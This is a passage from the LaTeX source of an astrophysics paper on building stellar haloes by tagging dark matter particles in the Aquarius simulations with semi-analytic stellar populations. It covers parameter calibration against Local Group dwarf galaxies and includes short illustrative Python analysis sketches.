in halo Aq-C, to an M33-analogue in Aq-E. This is not unexpected: the
Aquarius dark haloes were selected only on their mass and isolation, and
these criteria alone do not guarantee that they will host close
analogues of the Milky Way. The scaling and scatter in the predicted
relationship between halo mass and central galaxy stellar mass are
model-dependent. With the \galform{} parameter values of
Bower {et~al.}, the mean central stellar mass in a typical
Aquarius halo ($M_{\rm{halo}}\sim1.4\times10^{12}\mathrm{M_{\sun}}$) is
$\sim1.5\times10^{10}\,\mathrm{M_{\sun}}$, approximately a factor of
3--4 below typical estimates of the stellar mass of the Milky Way
($\sim6\times10^{10}\,\mathrm{M_{\sun}}$; Flynn {et~al.} 2006); the
scatter in $M_{\rm{gal}}$ for our central galaxies reflects the overall
distribution produced by the model of Bower {et~al.} (2006) for haloes of this
mass. The model of De~Lucia {et~al.} (2006), which like the Bower {et~al.} (2006)
model was constrained using statistical properties of bright field and
cluster populations, produces a mean central stellar mass of
$\sim4\times10^{10}\,\mathrm{M_{\sun}}$ for the typical halo mass of the
Aquarius simulations, as well as a smaller scatter about the mean value.
In light of these modelling uncertainties, and because the true Milky
Way dark halo mass is not observationally determined to this
precision, we choose not to scale the Aquarius haloes to
a specific mass for `direct' comparison with the Milky Way. The
results we present concerning the assembly and structure of stellar
haloes and the ensemble properties of satellite systems should not be
sensitive to whether or not their galaxies are predicted to be direct
analogues of the Milky Way by the Bower {et~al.} (2006) \galform{}
model. Therefore, in interpreting the \textit{absolute}
values of quantities compared to observational
data in the following sections, it should be borne in mind that we
model a \textit{range} of halo masses that could lie somewhat below
the likely Milky Way value.
The Bower {et~al.} (2006) implementation of \galform{} results in a
mass-metallicity relation for faint galaxies which is slightly steeper
than that derived from the satellites of the Milky Way and M31
(e.g. Mateo 1998; Kirby {et~al.} 2008; see also Tremonti {et~al.} 2004 and
refs. therein). This results in model galaxies being on average
$\sim0.5\,\rm{dex}$ more metal-poor in \feh{} than the observed
relation at magnitudes fainter than $M_{\rm{V}}\sim-10$. Whilst it
would be straightforward to make \textit{ad hoc} adjustments to the
model parameters in order to match this relation, doing so would
violate the agreement established between the Bower {et~al.} (2006)
parameter set and a wide range of statistical constraints from the
bright ($M_V<-19$) galaxy population.
\section{Building Stellar Haloes}
\label{sec:buildinghaloes}
\subsection{Assigning Stars To Dark Matter}
\label{sec:starstodm}
Observations of the stellar velocity distributions of dwarf spheroidal
satellites of the Milky Way imply that these objects are
dispersion-supported systems with extremely high mass-to-light ratios,
of order 10--1000
(e.g. Mateo 1998; Simon \& Geha 2007; Strigari {et~al.} 2007; Wolf {et~al.} 2009; Walker {et~al.} 2009). As
we describe in this section, in order to construct basic models of
these high-M/L systems without simulating their baryon dynamics
explicitly, we will assume that their stars are formed `dynamically
coupled' to a strongly bound fraction of their dominant dark matter
component, and will continue to trace that component throughout the
simulation. Here we further assume that the depth at which stars form
in a halo potential well depends only on the total mass of the
halo. While these assumptions are too simplistic a description of
stellar dynamics in such systems to compare with detailed structural
and kinematic observations, we show that they none the less result in
half-light radii and line-of-sight velocity dispersions in agreement
with those of Milky Way dwarf spheroidals. Hence the disruption of a
fraction of these model satellites by tidal forces in the main halo
should reproduce stellar halo components (`streams') at a level of
detail sufficient for an investigation of the assembly and gross
structure of stellar haloes. We stress that these comparisons
are used as constraints on the single additional free parameter in
our model, and are not intended as predictions of a model
for the satellite population.
In the context of our \galform{} model, the stellar content of a
single galaxy can be thought of as a superposition of many distinct
stellar populations, each defined by a particular formation time and
metallicity. Although the halo merger tree used as input to \galform{}
is discretized by the finite number of simulation outputs (snapshots),
much finer interpolating timesteps are taken between snapshots when
solving the differential equations governing star
formation. Consequently, a large number of distinct populations are
`resolved' by \galform{}. However, we can update our particle
(dynamical) data (and hence, can assign stars to dark matter) only at
output times of the pre-existing N-body simulation. For the purposes
of performing star-to-dark-matter assignments we reduce the
fine-grained information computed by \galform{} between one output
time and the next to a single aggregated population of `new stars'
formed at each snapshot.
As discussed above and in \mnsec{sec:introduction}, we adopt the
fundamental assumption that the motions of stars can be represented by
dark matter particles. The aim of our method here is to select a
sample of representative particles from the parent N-body simulation
to trace \textit{each such stellar population}, individually. We
describe first the general objective of our selection process, and
then examine the selection criteria that we apply in practice.
Consider first the case of a single galaxy evolving in isolation. At a
given simulation snapshot (B) the total mass of new stars formed since
the previous snapshot (A) is given by the difference in the stellar
mass of the semi-analytic galaxy recorded at each time,
\begin{equation}
{\Delta}M_{\star}^{AB} = M_{\star}^{B} -M_{\star}^{A}.
\end{equation}
In our terminology, $\Delta M_{\star}^{AB}$ is a single stellar
population (we do not track the small amount of mass lost during
subsequent stellar evolution). The total mass in metals within the
population is determined in the same way as the stellar mass; we do
not follow individual chemical elements. In a similar manner, the
luminosity of the new population (at $z=0$) is given by the difference
of the total luminosities (after evolution to $z=0$) at successive
snapshots.
From the list of particles in the simulation identified with the dark
matter halo of the galaxy at B, we select a subset to be tracers of
the stellar population ${\Delta}M_{\star}^{AB}$. Particles in this
tracer set are `tagged', i.e. are identified with data describing the
stellar population. In the scheme we adopt here, equal `weight'
(fraction of stellar mass, luminosity and metals in $\Delta
M_{\star}^{AB}$) is given to each particle in the set of tracers. We
repeat this process for all snapshots, applying the energy criterion
described below to \textit{select a new set of DM tracers each time
new stars are formed} in a particular galaxy. In this scheme, the
same DM particle can be selected as a tracer at more than one output
time (i.e. the same DM particle can be tagged with more than one
stellar population). Hence a given DM particle accumulates its own
individual star formation history. The dynamical evolution of
satellite haloes determines whether or not a particular particle is
eligible for the assignment of new stars during any given episode of
star formation.
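The bookkeeping described above can be sketched in a few lines of Python (a minimal illustration with hypothetical names, not the actual pipeline; in practice luminosities are tagged alongside masses and metals):

```python
def tag_particles(tracer_ids, delta_mstar, delta_metals, tags):
    """Share one newly formed stellar population equally among its set
    of tracer dark matter particles. `tags` maps a particle id to the
    list of (stellar mass, metal mass) tags it has accumulated; a
    particle tagged at several snapshots thereby builds up its own
    individual star formation history."""
    n = len(tracer_ids)
    for pid in tracer_ids:
        # equal 'weight': each tracer receives 1/n of the new population
        tags.setdefault(pid, []).append((delta_mstar / n, delta_metals / n))
    return tags
```

For example, a particle selected as a tracer at two successive snapshots ends up carrying two population tags.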
So far we have considered an `isolated' galaxy. In practice, we apply
this technique to a merger tree, in which a galaxy grows by the
accretion of satellites as well as by \textit{in situ} star
formation. In the expression above, the total stellar mass at A,
$M_{\star}^{A}$, is simply modified to include a sum over $N$
immediate progenitor galaxies in addition to the galaxy itself, i.e.
\begin{equation}
{\Delta}M_{\star}^{AB} = M_{\star}^{B} - M_{\star,0}^{A} - \sum_{i>0}
{M_{\star,i}^{A}},
\end{equation}
where $M_{\star,0}^{A}$ represents the galaxy itself and
$M_{\star,i}^{A}$ is the total stellar mass (at A) of the $i$th
progenitor deemed to have merged with the galaxy in the interval
AB. Stars forming in the progenitors during the interval AB and stars
forming in the galaxy itself are treated as a single population.
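As a check on the bookkeeping, the generalisation to a merger tree amounts to a one-line difference (function and argument names are our own):

```python
def new_stellar_mass(mstar_B, mstar_A_self, mstar_A_progenitors):
    """Mass of the single aggregated population formed in the interval
    AB: the stellar mass at B minus the galaxy's own mass at A and
    that of all progenitors merged during the interval."""
    return mstar_B - mstar_A_self - sum(mstar_A_progenitors)
```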
There is a one-to-one correspondence between a galaxy and a dark
matter structure (halo or subhalo) from which particles are chosen as
tracers of its newly formed stars. As discussed in
\mnsec{sec:galform}, a satellite galaxy whose host subhalo is no
longer identified by \subfind{} has its cold gas content transferred
immediately to the central galaxy of their common parent halo and
forms no new stars. In the semi-analytic model, the stars of the
satellite are also added to the bulge component of the central
galaxy. This choice is irrelevant in our particle representation, as
we can track the actual fate of these stars.
\begin{figure*}
\centering
\includegraphics[clip=false]{fig2.eps}
\caption{Examples of individual satellites in our models (solid black
lines), compared to Fornax (red) and Carina (blue), showing surface
brightness (left, Irwin \& Hatzidimitriou 1995) and line-of-sight velocity
dispersion (right, Walker {et~al.} 2009). With our fiducial
\galform{} model, simultaneous matches to both $\sigma(R)$ and
$\mu(R)$ for these datasets are found only among satellites that
have undergone substantial tidal stripping (see text).}
\label{fig:examplesatA11z0}
\end{figure*}
\subsection{Assignment criteria}
\label{sec:assignmentcriteria}
\subsubsection{Selection of dark matter particles}
\label{sec:method}
In this section we describe how we choose the dark matter particles
within haloes that are to be tagged with a newly formed stellar
population. In \mnsec{sec:introduction} we briefly described the
particle-tagging method employed by Bullock \& Johnston (2005), the philosophy
of which we term \textit{`in vitro'}, using idealised initial
conditions to simulate accretion events individually in a `controlled'
environment. By contrast, our approach is to \textit{postprocess}
fully cosmological simulations \textit{`in vivo'}\footnote{This
terminology should not be taken to imply that `star particles'
themselves are included in the N-body simulation; here stellar
populations are simply tags affixed to dark matter particles.}. In a
fully cosmological N-body simulation the growth of the central
potential, the structure of the halo and the orbits, accretion times
and tidal disruption of subhaloes are fully consistent with one
another. The central potential is non-spherical (although no disc
component is included in our dynamical model) and can grow violently
as well as through smooth accretion. Our model is therefore applicable
at high redshift when the halo is undergoing rapid assembly. The
complexities in the halo potential realised in a fully cosmological
simulation are likely to be an important influence on the dynamics of
satellites (e.g. Sales {et~al.} 2007a) and on the evolution of
streams, through phase-mixing and orbital precession
(e.g. Helmi \& White 1999).
We approach the selection of dark matter particles for stellar
tagging differently to Bullock \& Johnston (2005), because we are
postprocessing a cosmological N-body simulation rather than constructing
idealised initial conditions for each satellite. Rather than
assigning the mass-to-light ratio of each tagged particle by comparing
stellar and dark matter energy distribution functions in the halo
concerned, we assume that the energy distribution of newly formed stars
traces that of the dark matter. We order the particles in the
halo by binding energy\footnote{Here, the most bound particle is that
with the most negative total energy, including both kinetic and
gravitational contributions. Binding energies are computed relative to
the bound set of particles comprising an object identified by
\subfind{}.} and select a most-bound fraction $f_{\rm{MB}}$ to be
tagged with newly-formed stars. As previously described, stars are
shared equally among the selected DM particles.
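In practice this selection is a single sort over the bound particles of the \subfind{} group; a minimal NumPy sketch (function and variable names are our own):

```python
import numpy as np

def select_most_bound(total_energy, f_mb=0.01):
    """Indices of the most-bound fraction `f_mb` of a halo's particles.
    `total_energy` is kinetic plus gravitational energy per particle,
    so the most bound particles have the most negative values."""
    n_select = max(1, int(round(f_mb * len(total_energy))))
    order = np.argsort(total_energy)  # ascending: most bound first
    return order[:n_select]
```

Newly formed stars are then shared equally among the returned particles, as described above.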
Our approach implies a rather simple dynamical model for stars
in satellite galaxies. However, the main results of this paper do
not concern the satellites themselves; instead we focus on the
debris of objects that are totally (or largely) disrupted to build
the stellar halo. As we describe below, we compare the structure and
kinematics of our model satellites (those that survive at $z=0$) to
Local Group dwarf galaxies in order to fix the value of the free
parameter, $f_{\rm{MB}}$. Since we impose this constraint, our
method cannot predict these satellite properties \textit{ab
  initio}. Constraining our model in this way ensures reasonable
structural properties in the population of progenitor satellites,
and retains full predictive power with regard to the stellar
halo. More complex models would, of course, be possible, in which
$f_{\rm{MB}}$ is not a free parameter but is instead physically
determined by the semi-analytic model. It would also be possible to
use a more complicated tagging scheme to attempt to represent, for
example, star formation in a disc. However, such models would add
substantial complexity to the method, and there are currently very
few observational constraints on how stars were formed in satellite
galaxies. Thus, we believe that a simple model suffices for our
present study of the stellar halo.
Our approach has similarities with that of De~Lucia \& Helmi (2008), who tag
the most bound 10\% of particles in satellite haloes with
stars. However, De~Lucia \& Helmi perform this tagging only
\textit{once} for each satellite, at the time at which its parent halo
becomes a subhalo of the main halo (which we refer to as the time of
infall\footnote{In both Bullock \& Johnston (2005) and De~Lucia \& Helmi (2008) only
satellites directly accreted by the main halo `trigger' assignments
to dark matter; the hierarchy of mergers/accretions forming a
directly-infalling satellite are subsumed in that single
assignment.}). Both this approach and that of Bullock \& Johnston (2005)
define the end result of the previous dynamical evolution of an
infalling satellite, the former by assuming light traces dark matter
and the latter with a parameterized King profile.
As described above, in our model each newly-formed stellar population
is assigned to a subset of DM particles, chosen according to the
`instantaneous' dynamical state of its host halo. This choice is
independent of any previous star formation in the same halo. It is the
dynamical evolution of these many tracer sets in each satellite that
determines its stellar distribution at any point in the simulation.
Implementing a particle-tagging scheme such as this within a fully
cosmological simulation requires a number of additional issues to be
addressed, which we summarise here.
\renewcommand{\labelenumi}{\roman{enumi}}
\begin{enumerate}
\item \textit{Subhalo assignments}: Star formation in a satellite
galaxy will continue to tag particles regardless of the level of
its halo in the hierarchy of bound structures (halo, subhalo,
subsubhalo etc.). The growth of a dark matter halo ends when it
becomes a subhalo of a more massive object, whereupon its mass is
reduced through tidal stripping. The assignment of stars to
particles in the central regions according to binding energy
should, of course, be insensitive to the stripping of dark matter
at larger radii. However, choosing a fixed fraction of dark
matter tracer particles to represent new stellar populations
couples the mass of the subhalo to the number of particles
chosen. Therefore, when assigning stars to particles in a subhalo,
we instead select a fixed \textit{number} of particles, equal to
the number constituting the most-bound fraction $f_{\rm{MB}}$ of
the halo at the time of infall.
\item \textit{Equilibrium criterion}: To guard against assigning stars
to sets of tracer particles that are temporarily far from dynamical
equilibrium, we adopt the conservative measure of deferring
assignments to any halo in which the centres of mass and potential
are separated by more than 7\% of the half-mass radius $r_{1/2}$. We
select $0.07\,r_{1/2}$ in accordance with the criterion of
$0.14\,r_{\rm{vir}}$ used to select relaxed objects in the study of
Neto {et~al.} (2007), taking $r_{\rm{vir}}\sim2\,r_{1/2}$. These deferred
assignments are carried out at the next snapshot at which this
criterion is satisfied, or at the time of infall into a more massive
halo.
\item \textit{No in situ star formation}: Stars formed in the
main galaxy in each Aquarius simulation (identified as the central
galaxy of the most massive dark halo at $z=0$) are never assigned to
DM particles. This exclusion is applied over the entire history of
that galaxy. Stars formed in situ are likely to contribute to the
innermost regions of the stellar halo, within which they may be
redistributed in mergers. However, the dynamics of stars formed in a
dissipationally-collapsed, baryon-dominated thin disc cannot be
represented with particles chosen from a dark matter-only
simulation. We choose instead to study the accreted component in
isolation. Our technique none the less offers the possibility of
extracting \textit{some} information on a fraction of in situ stars
were we to assign them to dark matter particles (those contributing
to the bulge or forming at early times, for example). We choose to
omit this additional complexity here. SPH simulations of stellar
haloes (which naturally model the in situ component more accurately
than the accreted component) suggest that the contribution of in
situ stars to the halo is small beyond $\sim20$~kpc
(Abadi {et~al.} 2006; Zolotov {et~al.} 2009).
At early times, when the principal halo in each simulation is
growing rapidly and near-equal-mass mergers are common, the
definition of the `main' branch of its merger tree can become
ambiguous. Also, the main branch of the galaxy merger tree need not
follow the main branch of the halo tree. Hence, our choice of which
branch to exclude (on the basis that it is forming `in situ' stars)
also becomes ambiguous; indeed, it is not clear that any of these
`equivalent' early branches should be excluded. Later we will show
that two of our haloes have concentrated density profiles. We have
confirmed that these \textit{do not} arise from making the `wrong'
choice in these uncertain cases, i.e. from tagging particles in the
dynamically robust core of the `true' main halo. Making a different
choice of the excluded branch in these cases (before the principal
branch can be unambiguously identified) simply replaces one of these
concentrated components with another very similar
component. Therefore, we adopt the above definition of the galaxy
main branch when excluding in situ stars.
\end{enumerate}
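The equilibrium criterion in point (ii) reduces to a centre-offset test, which could be implemented as in the following rough sketch (our own conventions: the particle at the potential minimum serves as a proxy for the potential centre):

```python
import numpy as np

def is_relaxed(pos, mass, pot, tol=0.07):
    """Defer tagging unless the offset between the centre of mass and
    the potential centre is below `tol` (7 per cent) of the half-mass
    radius r_1/2. `pot` holds the gravitational potential energy of
    each particle."""
    com = np.average(pos, axis=0, weights=mass)
    cpot = pos[np.argmin(pot)]                 # potential-centre proxy
    r = np.linalg.norm(pos - cpot, axis=1)
    order = np.argsort(r)
    cmass = np.cumsum(mass[order])
    # radius enclosing half of the bound mass
    r_half = r[order][np.searchsorted(cmass, 0.5 * cmass[-1])]
    return np.linalg.norm(com - cpot) < tol * r_half
```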
\subsubsection{Individual satellites}
We show in the following section that, with a suitable choice of
the most-bound fraction, our method produces a population of
model satellites at $z=0$ having properties
consistent with observed relationships between
magnitude, half-light radius/surface brightness and velocity
dispersion for satellite populations of the Milky Way and M31. In
\fig{fig:examplesatA11z0} we show profiles of surface brightness and
velocity dispersion for two individual satellites from these models at
$z=0$, chosen to give a rough match to observations of Fornax and
Carina. This suggests that our galaxy formation model and the simple
prescription for the spatial distribution of star formation
can produce realistic stellar structures within dark
haloes. However, while it is possible to match these individual
observed satellites with examples drawn from our models, we caution
that we can only match their observed surface brightness and velocity
dispersion profiles \textit{simultaneously} by choosing model
satellites that have suffered substantial tidal stripping. This
is most notable in the case of our match to
Fornax, which retains only 2\% of its dark matter relative to
the time of its accretion to the main halo, and 20\% of its stellar
mass. However, as we show in \mnsec{sec:assembly}, the majority
of massive surviving satellites have not suffered substantial tidal
stripping.
We have tested our method with assignments for each satellite
delayed until the time of infall, as in De~Lucia \& Helmi (2008). This
results in slightly more compact galaxies than in our standard
\textit{in vivo} approach, where mergers and tidal forces (and
relaxation through two-body encounters for objects near the
resolution limit) can increase the energies of tagged dark matter
particles. However, we find that this makes little difference to the
results that we discuss below.
\subsubsection{Parameter constraints and convergence}
\label{sec:constraints}
\begin{figure}
\includegraphics[]{fig3.eps}
\caption{Median effective radius $r_{\rm{eff}}$ (enclosing half
  of the total luminosity in projection) as a function of magnitude
  for model satellites in haloes Aq-A and Aq-F at $z=0$. A thin
  vertical dashed line indicates the softening scale of the
  simulation: $r_{\rm{eff}}$ is unreliable close to this value and
  meaningless below it. \textit{Thick lines} represent our
  higher-resolution simulations (Aq-2) using a range of values
  of the fraction of most bound particles chosen in a stellar
  population assignment, $f_{\rm{MB}}$. \textit{Dotted lines}
  correspond to lower resolution simulations (Aq-3) of the same
  haloes. A \textit{thick dashed line} shows the corresponding median
  of observations of Local Group dwarf galaxies. These
  galaxies, and our model data points for all haloes in the Aq-2
  series with $f_{\rm{MB}}=1\%$, are plotted individually in
  \fig{fig:satellite_relations}.}
\label{fig:resolutiontests}
\end{figure}
We now compare the $z=0$ satellite populations of our models with
trends observed in the dwarf companions of the Milky Way and M31 in
order to determine a suitable choice of the fixed fraction,
$f_{\rm{MB}}$, of the most bound dark matter particles selected in a
given halo. Our aim is to study the stellar halo, and
therefore we use the sizes of our surviving satellites as a
constraint on $f_{\rm{MB}}$ and as a test of convergence. Within the
range of $f_{\rm{MB}}$ that produces plausible satellites, the gross
properties of our haloes, such as total luminosity, change by only a
few percent.
In \fig{fig:resolutiontests}, we show the relationship between the
absolute magnitudes, $M_{\rm{V}}$, of satellites (combining data from
two of our simulations, Aq-A and Aq-F), and the projected radius
enclosing one half of their total luminosity, which we refer to as the
effective radius, $r_{\rm{eff}}$. We
compare our models to a compilation of dwarf galaxy data in the
Local Group, including the satellites of the Milky Way and M31. The slope of the
median relation for our satellites agrees well with that of the data
for the choices $f_{\rm{MB}}=1\%$ and $3\%$. It is clear that a choice
of $5\%$ produces bright satellites that are too extended, while for
$0.5\%$ they are too compact. We therefore prefer $f_{\rm{MB}}=1\%$. A
more detailed comparison to the data at this level is problematic: the
observed sample of dwarf galaxies available at any given magnitude is
small, and the data themselves contain puzzling features such as an
apparently systematic difference in size between the bright Milky Way
and M31 satellites.
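The quantity $r_{\rm{eff}}$ plotted here is straightforward to measure from tagged particles; one possible implementation is sketched below (our own code, assuming a fixed line of sight along the $z$-axis):

```python
import numpy as np

def effective_radius(pos, lum, axis=2):
    """Projected radius enclosing half of the total luminosity of a
    galaxy's tagged particles, viewed along `axis` (z by default)."""
    i, j = [k for k in range(3) if k != axis]
    R = np.hypot(pos[:, i], pos[:, j])         # projected radii
    order = np.argsort(R)
    clum = np.cumsum(lum[order])
    # smallest projected radius enclosing half the luminosity
    return R[order][np.searchsorted(clum, 0.5 * clum[-1])]
```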
\begin{figure*}
\includegraphics[]{fig4.eps}
\caption{Projected half-light radius (left), mean luminosity-weighted
1D velocity dispersion (centre) and central surface brightness
(right) of simulated satellite galaxies (defined by
$r_{\rm{GC}}<280\,\rm{kpc}$) that survive in all haloes at $z=0$, as
a function of absolute \textit{V}-band magnitude. Observational data
for Milky Way and M31 satellites are shown as orange symbols; values
are from Mateo (1998) and other authors as follows: bright
satellites (triangles pointing right, Grebel, Gallagher \& Harbeck 2003); faint MW
satellites discovered since 2005 (triangles pointing
up, Martin, de~Jong \& Rix 2008); M31 dwarf spheroidals (triangles pointing
left, McConnachie {et~al.} 2006; Martin {et~al.} 2009); M31 ellipticals (squares); Local
Group `field' dwarf spheroidals and dwarf irregulars (stars). In the
central panel we use data for Milky Way satellites only tabulated by
Wolf {et~al.} (2009) and for the SMC, Grebel {et~al.} (2003). In the
rightmost panel, we plot data for the Milky Way and M31
(Grebel {et~al.} 2003; Martin {et~al.} 2008). A dashed line indicates the surface
brightness of an object of a given magnitude with
$r_{\rm{eff}}=2.8\epsilon$, the gravitational softening scale (see
\mnsec{sec:aquarius}).}
\label{fig:satellite_relations}
\end{figure*}
\fig{fig:resolutiontests} also shows (as dotted lines) the same results
for our model run on the lower-resolution simulations of haloes Aq-A and
Aq-F. The particle mass in the Aq-3 series is approximately three times
greater than in Aq-2, and the force softening scale is larger by a
factor of two. We concentrate on the convergence behaviour of our
simulations for galaxies larger than the softening length, and also
where our sample provides a statistically meaningful number of galaxies
at a given magnitude; this selection corresponds closely to the regime
of the brighter dwarf spheroidal satellites of the Milky Way and M31,
$-15<M_{\rm{V}}<-5$. In this regime, \fig{fig:resolutiontests} shows
convergence of the median relations brighter than $M_{\rm{V}}=-5$ for
$f_{\rm{MB}}=3\%$ and $5\%$. The case for $f_{\rm{MB}}=1\%$ is less
clear-cut. The number of particles available for a given assignment is
set by the mass of the halo; haloes near the resolution limit (with
$\sim100$ particles) will, of course, have only $\sim1$ particle
selected in a single assignment. In addition to this poor resolution,
galaxies formed by such small-number assignments are more sensitive to
spurious two-body heating in the innermost regions of subhaloes. We
therefore expect the resulting galaxies to be dominated by few-particle
`noise' and to show poor
convergence behaviour.
We adopt $f_{\rm{MB}}=1\%$ as a reasonable match to the data (noting
also that it lies close to the power-law fit employed by
Bullock \& Johnston (2005) to map luminosities to satellite sizes). We believe
the resulting satellites to be sufficiently converged at the
resolution of our Aq-2 simulations with this choice of $f_{\rm{MB}}$
to permit a statistical study of the disrupted population represented
by the stellar halo. In support of this assertion, we offer the
following heuristic argument. The change in resolution from Aq-3 to
Aq-2 results in approximately three times more particles being
selected at fixed $f_{\rm{MB}}$; likewise, a change in $f_{\rm{MB}}$
from 1\% to 3\% selects three times more particles at fixed
resolution. Therefore, as $f_{\rm{MB}}=3\%$ has converged at the
resolution of Aq-3, it is reasonable to expect that $f_{\rm{MB}}=1\%$
selects a sufficient number of particles to ensure that satellite
sizes are not dominated by noise at the resolution of Aq-2. We show
below that the most significant contribution to the halo comes from a
handful of well resolved objects with $M_{\rm{V}} < -10$, rather than
from the aggregation of many fainter satellites. Additionally, as
demonstrated, for example, by Pe{\~{n}}arrubia, McConnachie \&
Navarro (2008a), Pe{\~{n}}arrubia, Navarro \& McConnachie (2008b) and
Pe{\~{n}}arrubia {et~al.} (2009), there is a
`knife-edge' between the onset of stellar stripping and total
disruption for stars deeply embedded within the innermost few percent
of the dark matter in a halo. We conclude that premature stripping
resulting from an over-extension of very small satellites in our model
is unlikely to alter the gross properties of our stellar haloes.
The points raised above in connection with \fig{fig:resolutiontests}
make clear that the \textit{in vivo} particle tagging approach demands
extremely high resolution, near the limits of current cosmological
N-body simulations. The choice of $f_{\rm{MB}}=1\%$ in this approach
(from an acceptable range of 1--3\%) is not arbitrary: for example, a
choice of $f_{\rm{MB}}=10\%$ would produce bright satellites even
more extended than those shown for $f_{\rm{MB}}=5\%$ in
\fig{fig:resolutiontests}, in clear conflict with the observed
size--magnitude relation.

For the remainder of this paper we concentrate on the higher
resolution Aq-2 simulations. In \fig{fig:satellite_relations} we fix
$f_{\rm{MB}}$ at 1\% and compare the surviving satellites from all
six of our haloes with observational data for three properties
correlated with absolute magnitude: effective radius,
$r_{\rm{eff}}$, mean luminosity-weighted line-of-sight velocity
dispersion, $\sigma$, and central surface brightness, $\mu_{0}$
(although the latter is not independent of $r_{\rm{eff}}$). In all
cases our model satellites agree well with the trends and scatter in
the data brighter than $M_{\rm{V}} = -5$.
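The mean luminosity-weighted line-of-sight velocity dispersion shown in the central panel can be computed from the tagged particles as follows (a minimal sketch with our own names):

```python
import numpy as np

def los_velocity_dispersion(v_los, lum):
    """Luminosity-weighted 1D velocity dispersion along the line of
    sight, about the luminosity-weighted mean velocity."""
    vbar = np.average(v_los, weights=lum)
    return np.sqrt(np.average((v_los - vbar) ** 2, weights=lum))
```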
The force softening scale of the simulation (indicated in the first
and third panels by dashed lines) effectively imposes a maximum
density on satellite dark haloes. \newt{At} \newt{t}his radial scale
we would expect $r_{\rm{eff}}$ to become independent of magnitude
\newt{for numerical reasons}: \fig{fig:satellite_relations} shows that
the $r_{\rm{eff}}(M_{\rm{V}})$ relation becomes
steeper for galaxies fainter than
$M_{\rm{V}}\sim-9$, corresponding to
$r_{\rm{eff}}\sim200\,\rm{pc}$. This resolution-dependent maximum
density corresponds to a minimum surface brightness at a given
magnitude. The low-surface-brightness limit in the Milky Way data
shown in the right-hand panel of \fig{fig:satellite_relations}
corresponds to the completeness limit of current surveys
(e.g. Koposov {et~al.} 2008; Tollerud {et~al.} 2008). The lower surface brightness
satellite population predicted by our model is not, in principle,
incompatible with current data.
In \fig{fig:m300} we show the relationship between total luminosity
and the mass of dark matter enclosed within 300~pc, $M_{300}$, for our
simulated satellites in all haloes. This radial scale is well-resolved
in the level 2 Aquarius simulations (see also Font et al. 2009, in
prep.). Our galaxies show a steeper trend than the data of
Strigari {et~al.} (2008), with the strongest discrepancy (0.5 dex in
$M_{300}$) for the brightest satellites. Nevertheless, both show very
little variation, having $M_{300}\sim10^{7}\,\rm{M_{\sun}}$ over five
orders of magnitude in luminosity. In agreement with previous
studies using semi-analytic models and lower-resolution N-body
simulations (Macci{\`{o}}, Kang \& Moore 2009; Busha {et~al.} 2009; Li {et~al.} 2009b; Koposov {et~al.} 2009), and N-body
gasdynamic simulations (Okamoto \& Frenk 2009), we find that
this characteristic scale arises naturally as a result of
astrophysical processes including gas cooling, star formation and
feedback.
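For an equal-mass N-body simulation, $M_{300}$ reduces to a particle count; a sketch (our own names, with positions and radii in kpc):

```python
import numpy as np

def m300(pos, centre, particle_mass, r_cut=0.3):
    """Dark matter mass within 300 pc (r_cut = 0.3 kpc) of a satellite
    centre, counting equal-mass simulation particles."""
    r = np.linalg.norm(pos - centre, axis=1)
    return particle_mass * np.count_nonzero(r < r_cut)
```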
\begin{figure}
\includegraphics[]{fig5.eps}
\caption{Mass in dark matter enclosed within 300 pc ($M_{300}$) as a
function of luminosity (\textit{V}-band) for satellites in each of our
simulated haloes (coloured points, colours as
\fig{fig:galform_lf}). Maximum likelihood values of $M_{300}$ for
Milky Way dwarf spheroidals from Strigari {et~al.} (2008) are shown
(orange squares), with error bars indicating the range with
likelihood greater than 60.6\% of the maximum.}
\label{fig:m300}
\end{figure}
\subsection{Defining the stellar halo and satellite galaxies}
\label{sec:defining_haloes}
To conclude this section, we summarise the terminology we adopt when
describing our results. Tagged dark matter particles in the
self-bound haloes and subhaloes identified by \subfind{} constitute
our `galaxies'. Our stellar haloes comprise all tagged particles
bound to the main halo in the simulation, along with those tagged
particles not in any bound group (below we impose an additional
radial criterion on our definition of the stellar halo). All
galaxies within 280~kpc of the centre of the main halo are classed
as `satellites', as in the luminosity functions shown in
\fig{fig:galform_lf}. Centres of mass of the stellar haloes and
satellites are determined from tagged particles only, using the
iterative centring process described by
Power {et~al.} (2003).
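The centring procedure of Power {et~al.} (2003) is a shrinking-sphere iteration. The following Python sketch is an illustrative reimplementation, not the code used here; the `shrink` and `n_min` values are our own choices for demonstration.

```python
import numpy as np

def shrinking_sphere_centre(pos, mass, r_init, shrink=0.9, n_min=100):
    """Shrinking-sphere centre of mass in the spirit of Power et al.
    (2003): recompute the centre of mass of particles inside a sphere
    whose radius is reduced each iteration, stopping once too few
    particles remain. `shrink` and `n_min` are illustrative choices."""
    centre = np.average(pos, axis=0, weights=mass)
    r = r_init
    while True:
        d = np.linalg.norm(pos - centre, axis=1)
        inside = d < r
        if inside.sum() < n_min:
            return centre
        centre = np.average(pos[inside], axis=0, weights=mass[inside])
        r *= shrink
```

For a dense clump embedded in a diffuse background, the iteration converges onto the clump rather than onto the global centre of mass, which is the desired behaviour when centring on tagged particles.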
Many structural elements of a galaxy intermix within a few kiloparsecs
of its centre, and attempts to describe the innermost regions of a
stellar halo require a careful and
unambiguous definition of other components present. This is especially
important when distinguishing between those components that are
represented in our model and those that are not. Therefore, before
describing our haloes\footnote{We explicitly distinguish between the
stellar halo and the dark halo in ambiguous cases; typically the
former is implied throughout.}, we first summarise some of these
possible sources of confusion, clarify what is and is not included in
our model, and define a range of galactocentric distances on which we
will focus our analysis of the stellar halo.
As discussed above, our model does not track with particles any
stars formed in situ in the central `Milky Way' galaxy, whether in a
rotationally supported thin disc or otherwise (this central galaxy
is, of course, included in the underlying semi-analytic model). We
therefore refer to the halo stars that \textit{are} included in our
model as \textit{accreted} and those that form in the central galaxy
(and hence are \textit{not} explicitly tracked in our model) as \textit{in
situ}. Observational definitions of the `stellar halo' typically do
not attempt to distinguish between accreted and in situ stars, only
between components separated empirically by their kinematic, spatial
and chemical properties.
The `contamination' of a purely-accreted halo by stars formed in situ
is likely to be most acute near the plane of the disc. Observations of
the Milky Way and analogous galaxies frequently distinguish a `thick
disc' component (Gilmore \& Reid 1983; Carollo {et~al.} 2009) thought to
result either from dynamical heating of the thin disc by minor mergers
(e.g. Toth \& Ostriker 1992; Quinn, Hernquist \& Fullagar 1993; Velazquez \& White 1999; Font {et~al.} 2001; Benson {et~al.} 2004; Kazantzidis {et~al.} 2008)
or from accretion debris
(Abadi {et~al.} 2003; Yoachim \& Dalcanton 2005, 2008). \movt{The presence of such a
component in M31 is unclear: an `extended disc' is observed
